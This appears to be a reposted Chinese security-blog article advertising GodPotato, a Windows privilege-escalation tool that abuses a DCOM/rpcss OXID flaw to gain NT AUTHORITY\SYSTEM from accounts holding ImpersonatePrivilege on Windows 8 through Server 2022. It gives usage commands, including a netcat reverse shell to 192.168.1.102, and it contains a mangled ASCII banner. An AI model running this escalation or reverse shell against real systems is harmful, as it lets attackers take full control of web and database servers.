来源:https://github.com/BeichenDream/GodPotato
基于Potato提权6年的历史,从RottenPotato开始到JuicyPotatoNG结束,我通过研究DCOM发现了一个新技术,可以在Windows 2012-Windows 2022中实现提权。
rpcss在处理oxid时存在一些缺陷,rpcss是系统必须开启的服务,因此它几乎可以在任何 Windows 操作系统上运行,我将其命名为 GodPotato。
现在只要你有” ImpersonatePrivilege”权限,那你就是“NT AUTHORITYSYSTEM”,通常WEB服务和数据库服务都有“ImpersonatePrivilege”权限。
受影响版本:
Windows8 - Windows 11Windows Server 2012 - Windows Server 2022
FFFFF FFF FFFFFFFFFFFFFF FFF FFFFFFFFFFF FFFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFF FFF FFF FFF FFF FFF FFFFFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFFFFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFFFFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFFFFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFFFFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFFFFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFFFFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFFArguments:Required:True CommandLine (default cmd /c whoami)Example:GodPotato -cmd "cmd /c whoami"
使用程序内置的Clsid进行权限升级,执行一个简单的命令
GodPotato -cmd "cmd /c whoami"
定制Clsid和执行命令
GodPotato -cmd "cmd /c whoami"
执行反向的shell命令
GodPotato -cmd "nc -t -e C:WindowsSystem32cmd.exe 192.168.1.102 2012"原文始发于微信公众号(Khan安全攻防实验室):神兵利器丨GodPotato新版土豆提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论